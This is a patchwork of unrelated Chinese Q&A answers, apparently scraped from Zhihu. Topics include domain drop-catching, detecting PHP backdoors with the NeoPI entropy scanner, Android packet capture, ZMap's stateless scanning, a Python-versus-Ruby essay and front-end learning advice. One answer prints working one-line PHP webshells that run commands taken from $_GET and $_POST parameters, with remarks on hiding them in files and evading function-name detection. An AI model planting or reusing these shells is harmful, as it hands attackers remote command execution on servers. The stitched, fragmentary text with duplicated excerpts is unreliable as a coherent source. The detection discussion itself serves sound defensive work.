其实无非就是早早的准备好数据, 然后用高并发和快速的响应速度把这条数据向里面塞过去, 成功塞入你就抢到了, 没有成功,就被别人抢先, 而这些抢注商的做法也是这样.&br&&br&&ul&&li&充足的接口,
ICANN 的认证注册商只有不到1千, 也就是只有1千个接口, 而 namejet 和 snapnames 都有上百的注册接口 , 而其他公司 包括国内的公司 只有一到两个,
这是这些大的抢注商成功率高的最主要原因.
我们国内全部公司加起来才只有不到50条接口, 还不如他们一个公司的接口多.
&/li&&li&极快的速度,
在美国的抢注商有个很好的优势:
离域名数据库比较近,
你可能觉得只不过减少了几跳,
十几到几十毫秒而已,
这些时间就够他们多抢到很多域名了. &/li&&/ul&&b&&br&3. 个人怎么提高抢注成功率&/b&&br&&br&
啊, 可是我实在不想多花钱让抢注商帮忙注册, 更不想和别人竞价,
这样我会损失很多成本. 我想凭自己的本事抢到好域名, 难道不可以吗?
可以, 当然可以!
不过要用一些技术手段来支持, 纯肉身抢注者以前或许还能成功, 现在已经有些不行了. &br&&br&
个人抢注也还是有一些优势的, 因为每天过期的域名数何其多,
每天被预订的过期域名也是成千上万,
抢注商接口数虽然多 但也有限,
要抢注的域名也需要放在一个个队列里,
一个一个的拿出来向verisign 发起抢注请求 ( VeriSign 除了给网站提供可信证书业务外, 也是ICANN授权管理 .net .com 域名的机构 )
这样, 就有了一个时间差,
再加上每个域名过期的时间并非绝对的准点, 所以, 我们只瞄准几个域名, 把握的好还是有一些机会的.
&br&&ul&&li&选择好域名注册商,
一定要从ICANN 公布的有通用国际域名注册资质的注册商名单里选,
另外为了减少延迟, 这个注册商最好在美国, 并且最好多选几个&/li&&li& VeriSign 的ip地址为 69.58.181.89, 位置大概在美国的东海岸, 华盛顿附近,
不确定它所管理的通用国际域名的数据库具体是不是也在这个地方, 我个人觉得应该差不多.
所以, 你选择的注册商所在的机房 最好能离这里近一些, 或者 traceroute 一下看看中间跳过的节点数和速度.&/li&&li&准备好自己的注册信息, 准备好并发脚本, 保证自己脚本所在机器和注册商服务器之间延迟不要太大, 在预定过期时间之前1~ 2分钟, 开始向选定的各个注册商发起请求,
一直到这个域名的whois 请求改变... 小心被封&/li&&li&多摸索几次就知道要选哪些注册商,
脚本的速度如何了. &/li&&li&另外, 自己的注册信息要尽量的少, 可以减少几个字节,
加快速度 这是在看蔡文胜老师的访谈时 发现的 :p &/li&&li&如果真想做这一行,
有机会, 可以尝试通过 ICANN 和 VeriSign 的注册商认证,
有了自己的通道, 成功率会高很多,
去年ICANN 在招标新顶级域名时曾透漏过想放开域名注册的限制,
可能认证会松一些, 正是一个可以尝试的机会.&/li&&/ul&&br&###
###&br&ICANN 过期域名删除政策(040912): &a href=&///?target=http%3A//archive.icann.org/en/registrars/eddp-21sep04-enp.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ICANN | Archives| Expired Domain Deletion Policy&i class=&icon-external&&&/i&&/a&&br&ICANN 与 verisign 达成的注册协议.pdf: &a href=&///?target=http%3A//www.icann.org/en/resources/registries/rsep/verisign-request-redemption-grace-period-20mar12-en.pdf& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ICANN Registry request Service&i class=&icon-external&&&/i&&/a&&br&ICANN 99年对 NSI 的授权和协议: &a href=&///?target=http%3A//archive.icann.org/en/nsi/nsi-rla-04nov99.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ICANN | NSI-Registrar License and Agreement&i class=&icon-external&&&/i&&/a&&br&ICANN FAQ, 域名删除还没有确定的方案: &a href=&///?target=http%3A//www.icann.org/en/about/learning/faqs& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&FAQs | ICANN&i class=&icon-external&&&/i&&/a&&br&ICANN 认定有通用国际域名注册资质的注册商列表: &a href=&///?target=http%3A//www.icann.org/registrar-reports/accredited-list.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ICANN | ICANN-Accredited Registrars&i class=&icon-external&&&/i&&/a&&br&怎么买过期域名(提及了pre-release) : &a href=&///?target=http%3A///blog/domain-names/how-buy-expired-domain-name& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&How To Buy An Expired Domain Name&i class=&icon-external&&&/i&&/a&&br&域名历史,注册方法及其他介绍: &a href=&///?target=http%3A///domain-name-registration-and-major-registrars.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Domain Name Registration and Major Registrars&i class=&icon-external&&&/i&&/a&&br&CNBeta 域名发展史: &a href=&///?target=http%3A///articles/201279.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&[信息图]域名发展史&i class=&icon-external&&&/i&&/a&&br&蔡文胜创业家访谈: &a href=&///?target=http%3A//.cn/i//.shtml& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&站长之王蔡文胜:市场成熟后将进军域名停放&i class=&icon-external&&&/i&&/a&&br&NSI时期域名争议策略: &a href=&///?target=http%3A//.cn/GB/channel5/28/64.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&美国NSI公司《域名争议政策》&i class=&icon-external&&&/i&&/a&&br&&br&PS: 已在文章中加入的链接 并未在此注明&br&&br&####&br&&br&至此, 欢迎补充和指出错误.
因为个人兴趣, 简单做过一些域名抢注方面的事情, 分 初级, 中级, 高级三个部分说一下, 希望大家都能有所得.### 初级. 怎么注册刚过期域名 ###1. 查看具体删除时间:某域名过期/删除时间查询: 最近可抢注域名查询 (国际):
这一点也谈不上新奇,也谈不上是我见过的最变态的PHP后门。&br&&br&如果有服务器权限,可以扫描文件的话(作为管理员没道理不行吧?),这类后门会被一类使用统计方法(计算包括信息熵、&a class=& wrap external& href=&///?target=http%3A//en.wikipedia.org/wiki/Index_of_coincidence& target=&_blank& rel=&nofollow noreferrer&&Index of Coincidence&i class=&icon-external&&&/i&&/a&在内的一系列统计指标)的检测工具直接干爆。给一个很简单的例子:&a class=& wrap external& href=&///?target=https%3A///Neohapsis/NeoPI& target=&_blank& rel=&nofollow noreferrer&&Neohapsis/NeoPI · GitHub&i class=&icon-external&&&/i&&/a&&br&&br&使用这个Python脚本检查这个文件:&br&&div class=&highlight&&&pre&&code class=&language-text&&[[ Average IC for Search ]]
[[ Top 10 lowest IC files ]]
./test/test.php
[[ Top 10 entropic files for a given search ]]
./test/test.php
[[ Top 10 longest word files ]]
./test/test.php
[[ Top 10 signature match counts ]]
./test/test.php
[[ Top 10 SUPER-signature match counts (These are usually bad!) ]]
./test/test.php
[[ Top cumulative ranked files ]]
./test/test.php
&/code&&/pre&&/div&&br&单独扫描可能看不出什么,但是把它放在一个PHP框架里,你就会发现这个文件肯定位列前几名,尤其是entropy和IC两个项目。&br&&br&这个脚本还算比较简单的,但已经堪用了,再配合上一些基于指纹数据库的扫描器,一般很难有漏网之鱼了。我相信,更强大一些的扫描器都是会综合使用数据库和统计方法的。&br&&br&最后,更可靠的方法当然还是文件监视和版本控制了。
这一点也谈不上新奇,也谈不上是我见过的最变态的PHP后门。如果有服务器权限,可以扫描文件的话(作为管理员没道理不行吧?),这类后门会被一类使用统计方法(计算包括信息熵、在内的一系列统计指标)的检测工具直接干爆。给一个很简…
作为一个看了一年后门的人,已经能分清一句话是公是母了,这种马确实不太奇怪,&br&我觉得比较有意思的一句话后门有&br&&?php &br&echo `$_GET['id']` //插在文件中比较难发现&br&?&&br&&div class=&highlight&&&pre&&code class=&language-php&&&span class=&cp&&&?php&/span& &span class=&p&&(&/span&&span class=&nv&&$_&/span&&span class=&o&&=&/span&&span class=&nv&&$I&/span&&span class=&o&&.&/span&&span class=&nv&&$_GET&/span&&span class=&p&&[&/span&&span class=&mi&&3&/span&&span class=&p&&])&/span&&span class=&o&&.&/span&&span class=&nv&&$_&/span&&span class=&p&&(&/span&&span class=&nv&&$I&/span&&span class=&o&&.&/span&&span class=&nv&&$_POST&/span&&span class=&p&&[&/span&&span class=&mi&&4&/span&&span class=&p&&])&/span&&span class=&cp&&?&&/span&&span class=&x&& 据说PKAV大牛最近写了个生成这种后门的网页&/span&
&span class=&cp&&&?php&/span& &span class=&nv&&$_POST&/span&&span class=&p&&[&/span&&span class=&s1&&'s'&/span&&span class=&p&&](&/span&&span class=&nv&&$_POST&/span&&span class=&p&&[&/span&&span class=&s1&&'cmd'&/span&&span class=&p&&]);&/span&&span class=&c1&&//躲避函数名查杀&/span&
&span class=&cp&&?&&/span&&span class=&x&&&/span&
&span class=&x&&还有用inlude调用图片的马&/span&
&/code&&/pre&&/div&
作为一个看了一年后门的人,已经能分清一句话是公是母了,这种马确实不太奇怪,我觉得比较有意思的一句话后门有&?php echo `$_GET['id']` //插在文件中比较难发现?&&?php ($_=$I.$_GET[3]).$_($I.$_POST[4])?& 据说PKAV大牛最近写了个生成这种后门的网页
谢谢 &a data-title=&@bystander& data-editable=&true& class=&member_mention& href=&///people/5ed7bd27ceb96cfda22409& data-hash=&5ed7bd27ceb96cfda22409& data-tip=&p$b$5ed7bd27ceb96cfda22409&&@bystander&/a&、 &a class=&member_mention& href=&///people/413df232fd0e85e2bbf792c956a94b65& data-hash=&413df232fd0e85e2bbf792c956a94b65& data-tip=&p$b$413df232fd0e85e2bbf792c956a94b65&&@徐仙明&/a&
、 &a class=&member_mention& href=&///people/7daac46c75d7cac1e7d2& data-hash=&7daac46c75d7cac1e7d2& data-tip=&p$b$7daac46c75d7cac1e7d2&&@朱焕杰&/a& 和其他朋友的帮助,Wi.cap. Network sniffer Pro要付费,所以在国内无法下载,DEMO版的运行正常,但看不到数据内容。在网上找到用了D版(&a class=& wrap external& href=&///?target=http%3A///android--1.html& target=&_blank& rel=&nofollow noreferrer&&【G软件】网络数据包嗅探器Wi.cap. Network sniffer Pro v1.2.8已付费)&i class=&icon-external&&&/i&&/a&结果总是显示需要至少验证一次授权,仍然不能使用(如果是我使用错误,请指正)&br&&br&最后使用了&a class=& wrap external& href=&///?target=http%3A///apps/blake.hamilton.bitshark& target=&_blank& rel=&nofollow noreferrer&&「比特鲨
bitShark」安卓版&i class=&icon-external&&&/i&&/a&了,非常成功,保存的pcap文件可以手机直接查看,也可转到电脑中用&a class=& wrap external& href=&///?target=http%3A//www.wireshark.org/download.html& target=&_blank& rel=&nofollow noreferrer&&Wireshark&i class=&icon-external&&&/i&&/a&分析。&br&&img data-rawheight=&512& data-rawwidth=&307& src=&/294e078a16bd4feb02b56d_b.jpg& class=&content_image& width=&307&&&img data-rawheight=&512& data-rawwidth=&307& src=&/5ac142fec1c0df305c82d0d66fcd1377_b.jpg& class=&content_image& width=&307&&&img data-rawheight=&512& data-rawwidth=&307& src=&/c9ddedb1a13cbf_b.jpg& class=&content_image& width=&307&&&img data-rawheight=&512& data-rawwidth=&307& src=&/dc20c104fcfd030d5d175a_b.jpg& class=&content_image& width=&307&&
和其他朋友的帮助,Wi.cap. Network sniffer Pro要付费,所以在国内无法下载,DEMO版的运行正常,但看不到数据内容。在网上找到用了D版(结果总…
如果是用于测试,方便的做法是笔记本连网线, 将无线共享出来, Android 或者iOS 连接PC 的无线。 在PC 上安装Wireshark 或者Network Monitor。 个人推荐Network Monitor, 微软出品。功能比较强大, 不光是HTTP的请求,几乎支持所有常见的各层网络协议解析。
如果是用于测试,方便的做法是笔记本连网线, 将无线共享出来, Android 或者iOS 连接PC 的无线。 在PC 上安装Wireshark 或者Network Monitor。 个人推荐Network Monitor, 微软出品。功能比较强大, 不光是HTTP的请求,几乎支持所有常见的各层网络协议解析。
不知道Chrome插件,不过知道一个网站。&br&&a href=&///?target=http%3A//www.clipconverter.cc/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&YouTube Video Converter and Download&i class=&icon-external&&&/i&&/a&&br&这个网站贴上Youtube的视频地址就可以了,可选择各种清晰度和格式下载。
不知道Chrome插件,不过知道一个网站。这个网站贴上Youtube的视频地址就可以了,可选择各种清晰度和格式下载。
Firefox 有各种64为的第三方编译版本,表现的都还不错。&br&&a class=& wrap external& href=&///?target=http%3A///archives/1933& target=&_blank& rel=&nofollow noreferrer&&Firefox浏览器64位版本集合(lawlietfox、Pale Moon、Cyberfox、Waterfox)&i class=&icon-external&&&/i&&/a&
Firefox 有各种64为的第三方编译版本,表现的都还不错。
&a href=&///?target=https%3A///makinacorpus/spynner& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&makinacorpus/spynner 路 GitHub&i class=&icon-external&&&/i&&/a&&br&这个python库其实是完整的浏览器,非常强大。需要pyqt和x11,windows下可以使用cygwin。
这个python库其实是完整的浏览器,非常强大。需要pyqt和x11,windows下可以使用cygwin。
传统上的TCP/IP需要“三次握手”报文交互,在此期间需要维持记录着与对方交互的状态。&br&这种状态记录量是巨大的,占用内存和CPU资源很大。&br&而ZMap索性就不进行三次握手,只进行第一个SYN,然后等待对方回复SYN-ACK,之后即RST取消连接。这样肯定会因网络原因丢失一定比例的数据,根据其实验,这个比例在2%左右。&br&以上策略,在nmap中也有实现,即其TCP SYN扫描方式。&br&关键性的问题出现在对回复的SYN-ACK进行seq number的校验。传统上就需要记录状态。&br&而ZMap是将对方receiver ip地址进行hash,将其处理保存到了sender port和seq number两个字段中,当SYN-ACK回来的时候,就可以根据sender ip、receiver port、ack number这些字段进行校验。&br&因此避免了状态存储,接近了网络带宽极限。&br&&img src=&/e55c15b5d58a3e04572e_b.jpg& data-rawwidth=&939& data-rawheight=&698& class=&origin_image zh-lightbox-thumb& width=&939& data-original=&/e55c15b5d58a3e04572e_r.jpg&&&br&性能方面:&br&单台服务器,扫描整个IPv4地址空间,耗时45分钟,将所接&b&1Gb的带宽&/b&占用了97%。&br&&img src=&/fce61b8c480a8f44e01de83a309fc54b_b.jpg& data-rawwidth=&947& data-rawheight=&704& class=&origin_image zh-lightbox-thumb& width=&947& data-original=&/fce61b8c480a8f44e01de83a309fc54b_r.jpg&&不仅速度上比Nmap(TCP SYN模式)高不少,而且其设计的无状态机制,让其搜索成功的覆盖率也增加了。&br&&img src=&/e5df4c569f80_b.jpg& data-rawwidth=&943& data-rawheight=&711& class=&origin_image zh-lightbox-thumb& width=&943& data-original=&/e5df4c569f80_r.jpg&&&br&与Nmap等已有系统对比:&br&NMap是一个通用网络监测工具,可以适用于不同协议、不同范围的测试。&br&而ZMap专做单端口、大范围的网络监测。&br&这也让ZMap能在这单一领域做很多优化。&br&&img src=&/1c1115f8bea77ad5c323eeab0032395d_b.jpg& data-rawwidth=&949& data-rawheight=&704& class=&origin_image zh-lightbox-thumb& width=&949& data-original=&/1c1115f8bea77ad5c323eeab0032395d_r.jpg&&&br&&a href=&///?target=https%3A//zmap.io/paper.pdf& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&zmap.io/paper.pdf&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
传统上的TCP/IP需要“三次握手”报文交互,在此期间需要维持记录着与对方交互的状态。这种状态记录量是巨大的,占用内存和CPU资源很大。而ZMap索性就不进行三次握手,只进行第一个SYN,然后等待对方回复SYN-ACK,之后即RST取消连接。这样肯定会因网络原因丢…
抛个砖引块玉。
&br& 个人觉得任何一门语言想要学好,最重要的还是打好基础。夯实了基础才能跳的更高,走的更远。前端语言学习也是这样,不能仅仅是工程导向的的学习,用到什么了才去找什么(搜索式学习),那样不能形成一个系统的知识框架。
&br&## Javascript: &br&&br&有些常见概念要搞清楚:继承,闭包,原型链,作用域链,事件流等。&br&&br&进阶:可以了解一些函数或操作的内部机制:eg,&br&* `new`操作符的工作机制(The &b&new&/b& Operator &a href=&///?target=http%3A//d.pr/UfZH& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/UfZH&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&[[Construct]]&a href=&///?target=http%3A//d.pr/8C4V& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/8C4V&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&)&br&* 创建一个函数的内部机制&br&* instanceof的工作机制,衍生问题如何判断一个变量是否是数组 &a href=&///?target=http%3A//d.pr/PUVX& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/PUVX&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&* this的取值&br&* __proto__ 和 prototype
&a href=&///?target=http%3A//d.pr/owct& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&[[Prototype]] and prototype&i class=&icon-external&&&/i&&/a&&br&&br&## CSS:&br&&br&1、盒模型,标准模式和非标准模式下盒模型渲染会有什么不同
&br&2、常见的定位方式有哪些,relative absolute fixed定位有哪些不同 &br&3、常见的浏览器兼容问题有哪些,如IE的hasLayout是怎么个东西,常用哪些方式来出触发hasLayout;z-index在IE和其它浏览器中有啥不同。还有著名的双边距bug,li中浮动元素bug等,进阶的可以了解BFC及其衍生的一系列问题。&br&4、常用的CSS Hack&br&&br& 下面这些书可以看一下:
&br& ========
&br& Javascript高级程序设计
&br& Javascript语言精粹
&br& 高性能Javascript
&br& Javascript权威指南
&br& CSS Mastery
&br& CSS权威指南
&br& ========
抛个砖引块玉。 ==== 个人觉得任何一门语言想要学好,最重要的还是打好基础。夯实了基础才能跳的更高,走的更远。前端语言学习也是这样,不能仅仅是工程导向的的学习,用到什么了才去找什么(搜索式学习),那样不能形成一个系统的知识框架。 ## Javascript:…
看到这个热烈的讨论, 想谈一谈其他的观点, 希望think out of box&br&&br&我在06年左右开始放弃自己十多年的C++转python, 当时我和周围的C++程序员聊, 大家都是&呵呵&, 没有真的用的. 如今我有机会见到当年的老同事, 他们都或多或少是python的用户, 这让我很欣慰.&br&&br&我想要讲的, 就是这个世界的另外一面. 我们必须承认, C C++ 和 Java的用户远远多于 php python 和 ruby的用户, 这些用户其实完全不在乎社区聚会, 有的完全不了解web开发, 甚至有的连open source都没有听说过, 更别谈hacker精神了.&br&&br&同理, 我相信, 用这三种语言开发web的用户, 肯定是php最多, 如果是ruby或者python, 我还是觉得ruby用户多一点. 可以不靠谱的说, 用ruby的用户就是rails用户, 但是在python世界中, 情况完全不一样.&br&&br&我曾经和一个朋友聊天, 我说我是python开发者, 他说他也是. 我问他你用什么框架开发? 他说他从来都不玩web, 他只知道用python开发自动测试脚本... &br&&br&不可否认java, php, ruby和python是因为web开发水涨船高, 同样的情况发生在objc和iOS的关系上. C和硬件开发, Java和企业级, 造就了那些编程语言的统计排名的区别. 但是真正在广大的现实生活中找一个C++程序员, 你有机会遇到一些学技术只是混口饭吃的人, 当然他们的C++水平大大的高于你的水平, 只是他们完全不存在互联网世界.&br&&br&在谈谈最后这几种语言, 实际上需要谈的也只有ruby和python这两种&br&ruby以web流行, 现在开始跳出这个框子, 进入到其他领域, 比如homebrew, watir. 同时我们不得不承认rails已经开始臃肿, 很多人开始转向ruby的其他微框架.&br&&br&我的观点是, ruby语法很优美, 干活很快. 但是它有没有帮助工程师解决很多本质的问题? 很多人通过rails学会使用jquery. 没错, 通过gem, 但是在这样的快捷方式安装下, 他甚至不知道jquery的js文件放在哪里. 我没有时间去仔细研究rails给出更多的例子, 但是无论从rails的教程, 还是视频, 几分钟做一个博客... 都可以看出他们用&简单&作为营销方式, 让新用户跳进这个坑, 后来才发现坑有点深. 这与微软的开发技术很像, 用visual studio这样豪华的编辑器, 告诉你鼠标点点就能编程, 可惜结果完全不是这样. &br&&br&这个很值得同行学习, 我在向朋友推荐技术的时候, 也发现了这样的问题, 告诉他们这个简单, 是大多数人学习的动力. 当年Java不也是那么吹的, 结果当mac的架构从powerpc编程intel的时候, 用eclipse的同事就开始骂人了: 不是说一次编译到处执行吗? 骗人的, 都是骗人的!&br&&br&我不想说太多关于其他语言的坏话, 或许我已经说了, 好吧原谅我讲点您可能不喜欢的事实. python也有很多坑, 安装个mysql-python就有可能遇到很多问题. python社区从前几年的热火朝天, 到现在似乎帖子不多, 是因为已经没有很多问题需要热烈讨论了. 从python2.3 2.4的时候, 大家发现了这么一个简单的(近似)全功能语言, 已经尝试着去了解它, 了解它的标准库, 以及第三方库. 那些知识都在邮件列表里面, 只要搜索就可以获得. 当然我还是看到某些qq群里面有人在问类似的问题, 他们甚至希望可以把自己的工作完全交给群里的其他用户解决, 其他的我就不说了.&br&&br&我认为python的好处有两点, 第一是对于那些不具有geek精神的人, 它是一个简单的解决方案. 这些人从来不混社区, 从来不钻研, 只需要解决问题的时候找到一段代码块, 读也不读, 贴上去测试, 完事... 这个世界上有很多这样的人, 菲律宾这样的程序员特别多.&br&&br&第二, 就是对于非常geek的人, 比如想instergam, Dropbox这样的团队, 不仅仅是geek, 而且要求做事情有美感, 追求pythonic的人, python这种能忽悠菜鸟的玩意, 居然也可以被一流团队在工业级别的生产环境使用, 这太没天理了.&br&&br&观点表达完毕&br&&br&python的社区还是有很多事情要做的, 比如他们把很多web框架都抄了一遍, 各种思想的都有, 比如最早的zope, z-object系统的思想还是很有看头的, django可以说对应rails, 还有TG和Pylons, 还有tornado这样神奇的东西ruby社区还没有吧, 只能对应nodejs了. 但是你们发现了没有, python的这些framework基本上没有screen cast, 我晕你们到底在不在营销你们的framework? tornado的文档居然那么简单, 居然给你link让你直接去读代码?!&br&&br&还有一些其他领域的东西, 比如和R语言对抗的pandas, 做统计的. 还有cocos2d, 最早是用python实现的原型, 后来port到iOS火了半边天, 不过他们的文档也是比较烂, 有没有screen cast也不好说, 应该很容易被包装过的产品打败吧.&br&&br&但是, 我认为python最重要的, 还是在与背后的pythonic思想, zen of python. 我相信如果一个成熟的工程师, 能搞定大部分事情是第一步, 理解事物背后的规律并且能用优美的方式解决才是常态, 之后就会按照pythonic的方法, 优雅的搞定所有的工作. pythonic是hacker精神的延续. &br&&br&同时有经验的工程师也不会陷入某种狂热或者崇拜之中, 你说一个东西好, 那么我也要看一看才能相信你所说的. 那些在java, php里面投入很多的工程师, 也或多或少的达到了pythonic的境界.&br&&br&最后我也很能理解tornado文档的那种感觉, MVC都不懂的初学者你就别来了, 去学个django或者rails入门吧, 我没多少文档给你, 不懂去读代码吧.
看到这个热烈的讨论, 想谈一谈其他的观点, 希望think out of box我在06年左右开始放弃自己十多年的C++转python, 当时我和周围的C++程序员聊, 大家都是"呵呵", 没有真的用的. 如今我有机会见到当年的老同事, 他们都或多或少是python的用户, 这让我很欣慰.我…
&b&抓包&/b&&br&先从熟悉的下手,HTTP,FTP。&br&&b&封装包&/b& &br&自己封装包,和现有协议通信。TCP/IP协议作为一个底层协议,不仅可以编写聊天程序,很多高层协议都是基于TCP/IP编写的。&br&自己造轮子,这样也有助于理解其它协议,比如连接、查询MySQL(用Socekt函数而不是库函数),自己封装一个memched函数库…&br&以前我大学时用perl发送“飞鸽传书”包,经常上课的时候同学们集体收到弹出信息,却不知道发送者是谁,很有成就感。&b&如果你做已经事没有成就感,就很快会失去动力。&/b&&br&&b&他山之石&/b&&br&经常去github。&br&&b&源码&/b&&br&读读TCP/IP协议的实现代码,去翻翻 linux 1.0 源码。
抓包先从熟悉的下手,HTTP,FTP。封装包 自己封装包,和现有协议通信。TCP/IP协议作为一个底层协议,不仅可以编写聊天程序,很多高层协议都是基于TCP/IP编写的。自己造轮子,这样也有助于理解其它协议,比如连接、查询MySQL(用Socekt函数而不是库函数),…
首先你已经不是零基础了。&br&&br&其实这种事情没有什么捷径,亲自动手,一步一步来即可,不能好高骛远。&br&&br&Step 1: 用 HTML + CSS 模仿几个漂亮的静态页面。当你看到现在大部分的网页都觉得能大概猜到怎样做,并且花时间真的能做出来的时候,即可进入下一步。注意,这个时候请你不要管浏览器兼容性或者太过注意代码的优雅结构,因为没必要。做到能兼容现代浏览器,内容和样式基本完全分离即可。这大概需要半个月到一个月的学习时间。&br&&br&Step 2: 用 HTML + CSS + JS 写几个有交互的页面。例如,你可以写一个漂亮的注册页面,它能够验证各种输入是否符合条件并且有一个用原生 JS 实现的日期选择器(Date Picker)。或者,写一个漂亮的,有动画的相册。注意,这个阶段请使用原生 JavaScript。同样的,兼容现代浏览器即可。这大概需要半个月的学习时间。&br&&br&Step 3: 入门一门后端语言。按照你的情况,就 php 吧。有了上面的经验,php 入门之后,相信你能够做一个漂亮的无用户留言版了。请把数据存贮在文件中,因为你还没有学习 SQL 嘛。这大概需要半个月的时间,如果你学习能力强,一个星期也不是没有可能。&br&&br&Step 4: 入门一个关系数据库。比如说 MySQL。DDL 和 CRUD ,请一定要熟练。恩,这个阶段不要谈什么优化,那是扯淡。现在,你大概可以做一个多用户的博客程序了。这大概需要半个月的时间。&br&&br&你看,两个半月不到你就可以成为一个初级的 Web 开发者了。博客做好之后,你可以尝试造更多的轮子。比如:带简单的用户权限的论坛程序、简单的记账工具,等等,做你喜欢做的任何小程序都行。在这个过程中,你会变成一个熟练的初级程序员,或者,你为了偷懒,会学会 jQuery,Smarty 等框架。&br&&br&有一天,你发现你靠写小程序提高不了水平了。接下来就要学习真正的干货了。&br&&ul&&li&学习 C 语言。别问我为什么,我就是觉得一个程序员应该要学过 C 语言,牛逼不牛逼是另外一会事儿,况且很多书都是用的 C 语言描述。别光学语法,弄清编译是什么,链接是什么,指针是又怎么一会事儿。&br&&/li&&li&学习数据结构和简单的算法。你看,你学完 C 语言就能学数据结构和算法了,我难以想象用 php 来描述数据结构和算法会有多么地奇怪。如果你觉得学了之后还是不知道数据结构究竟是什么,有什么用,那证明你还没有真的学到。&br&&/li&&li&学习一门面向对象的静态编程语言。推荐 Java。学得有多好,就看你花了多少时间了。请务必仔细阅读各类相关书籍,深刻领会面向对象的重要编程思想(不过,切忌迷信面向对象编程)。&br&&/li&&li&学习操作系统和计算机网络。至少一些基本的概念需要弄清楚,具体的细节,没有必要过于纠结。&/li&&/ul&Okay...以上都可划为「不求甚解」的阶段,接下来就可以选一个方向(前端,或者后端)「求甚解」了。在「求甚解」的阶段里,我这里就不细说了,也没法儿细说,并且你到了这个阶段,一般是不需要别人告诉你需要学什么了。所以,我只说在进入这个阶段之前,或者刚刚进入这个阶段时,最好去做的一些事情:&br&&ul&&li&看书或文档抛弃中文译本,借助各种工具阅读英文原版。&br&&/li&&li&学习使用 Unix-like 系统。&br&&/li&&li&学会提问[1]。&br&&/li&&li&订阅科技博客,了解业界正在发生什么事情。&/li&&/ul&Happy hacking!&br&&br&[1] 提问的智慧:&a href=&///?target=http%3A///smart-questions/smart-questions-zh.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/smart-questions&/span&&span class=&invisible&&/smart-questions-zh.html&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&
首先你已经不是零基础了。其实这种事情没有什么捷径,亲自动手,一步一步来即可,不能好高骛远。Step 1: 用 HTML + CSS 模仿几个漂亮的静态页面。当你看到现在大部分的网页都觉得能大概猜到怎样做,并且花时间真的能做出来的时候,即可进入下一步。注意,这…
跟着&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Learn to code&i class=&icon-external&&&/i&&/a&的步骤学,它里面选初学者,第一个开始是HTML&CSS,接着是JAVASCRIP,如果不会做里面的题目可以问论坛,同时可结合&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&W3Schools Online Web Tutorials&i class=&icon-external&&&/i&&/a&进行补充学习。另外W3School还有中文版的。
跟着的步骤学,它里面选初学者,第一个开始是HTML&CSS,接着是JAVASCRIP,如果不会做里面的题目可以问论坛,同时可结合进行补充学习。另外W3School还有中文版的。
如果是编程零基础,我的建议是:&ol&&li&HTML & CSS
&/li&&li&JavaScript
&/li&&li&服务端语言(php,python等)
&/li&&/ol&这三者的学习深度可以以w3schools的深度为准,当三者已经有了一定基础,结合起来能写出一些成品时,再根据自己的兴趣选择1,2,3三个方向中的一个进行深入学习(当然,你如果有极客精神不妨通吃)。这三方面的深入学习大致包含:&ol&&li&web标准,浏览器兼容,架构等&/li&&li&编程的基础知识(算法,设计模式等),js特性、浏览器特性深入学习&/li&&li&除编程的基础知识外等,另外还包含对操作系统的学习(进程、文件、网络等等)&/li&&/ol&
如果是编程零基础,我的建议是:HTML & CSS JavaScript 服务端语言(php,python等) 这三者的学习深度可以以w3schools的深度为准,当三者已经有了一定基础,结合起来能写出一些成品时,再根据自己的兴趣选择1,2,3三个方向中的一个进行深入学习(当然,你…
&b&为了能让大家第一眼阅读到最新内容,更新就写到上面了。&/b&&br&&br&这篇文章写于12年年初,到现在有三年多了,截至到现在赞同数494,被收藏 1199 次,不算多。问题被编辑多次之后,原回答已经不是很符合意境了,所以我还是继续补充了。&br&&br&&b&技术背景:可能擅长php+js&br&&/b&&br&&b&日续写....&/b&&br&&br&我极其不赞同那些发一大篇大而全知识结构图,那种回答然并卵,对于普遍大学生来说,太技术的东西他们根本看不懂,在我看来&b&大学生更重要的是培养习惯和拓宽视野。&/b&&br&&br&&b&题主提到的是大学时期的规划,那就说说大学可以干的一些事情。&/b&内容不局限在某个特定职位,你可能做不到全部,这些能力也不可能一蹴而就,但只要坚持做到几点,对以后职业生涯是受益匪浅。&br&&br&&b&先学会科学上网再说&/b&&br&之前培训新人给他们分享过很多文章链接他们都访问不了,沟通大受局限,因此我把科学上网摆在第一位,之后分享的链接有部分人可能无法访问,需自学科学上网,这里就不多说了。&br&&br&&b&学好英语&/b&&br&除了团队内部沟通用中文外,大量时间都是在和英文打交道。从事技术不会英语等同于文盲,尤其在技术进阶阶段英语的重要性毋庸置疑。三点:&br&1. 读懂英文技术文档(文档的重要性和时效性超过书籍)。&br&2. 可以用英文进行交流(社交网络 & IM等聊天工具)。&br&3. 